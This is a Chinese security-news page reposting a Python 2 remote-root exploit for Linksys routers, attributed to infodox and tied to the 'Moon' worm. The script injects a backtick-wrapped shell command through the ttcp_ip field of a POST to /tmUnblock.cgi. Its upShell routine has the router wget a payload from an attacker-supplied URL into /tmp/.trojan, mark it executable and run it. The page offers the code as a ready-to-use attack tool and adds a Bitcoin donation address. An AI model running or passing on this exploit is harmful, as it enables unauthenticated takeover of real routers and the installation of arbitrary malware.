首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linksys Worm Remote Root
来源:@info_dox 作者:infodox 发布时间:2014-02-19  
#!/usr/bin/python2 """" Linksys Remote Root Exploit infodox - insecurety research This is the exploit this "Moon" worm uses. Trivial blind cmd injection :) This version crippled - uses wget. Twitter: @info_dox Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku """ import requests import sys def banner(): print """\x1b[0;32m .____ .__ __ | | |__| ____ | | __ _________.__. ______ | | | |/ \| |/ / / ___< | |/ ___/ | |___| | | \ < \___ \ \___ |\___ \ |_______ \__|___| /__|_ \/____ >/ ____/____ > \/ \/ \/ \/ \/ \/ You are the weakest link. Goodbye. Linksys remote root - infodox - Insecurety Research. Version 2: Crippled (wget shelldrop only) \x1b[0m""" def upShell(wget_url, target): """ This works with the normal busybox wget at least, and worked in testing""" cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url) print "{+} Planting Bomb!" execute_command(target=target, command=cmd) print "{!} TERRORISTS WIN!" def execute_command(target, command): url = target + "/tmUnblock.cgi" injection = "-h `%s`" %(command) # this is a very sexy POST request. TOTALLY LEGIT. the_ownage = {'submit_button': '', 'change_action': '', 'action': '', 'commit': '0', 'ttcp_num': '2', 'ttcp_size': '2', 'ttcp_ip': injection, 'StartEPI': '1'} headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'} # it is truly mad hax. mad_hax = requests.post(url=url, data=the_ownage, headers=headers) def main(args): banner() if len(sys.argv) != 3: sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0])) upShell(wget_url=sys.argv[2], target=sys.argv[1]) if __name__ == "__main__": main(sys.argv)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle Forms and Reports Remot
·WRT120N 1.0.0.7 Stack Overflow
·Eudora Qualcomm WorldMail 9.0.
·Catia V5-6R2013 "CATV5_AllAppl
·Linksys E-series Unauthenticat
·SolidWorks Workgroup PDM 2014
·Dexter (CasinoLoader) SQL Inje
·Audiotran PLS File Stack Buffe
·HP Data Protector EXEC_BAR Rem
·MediaWiki Thumb.php Remote Com
·ImageMagick 6.8.8-4 - Local Bu
·WRT120N 1.0.0.7 Stack Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved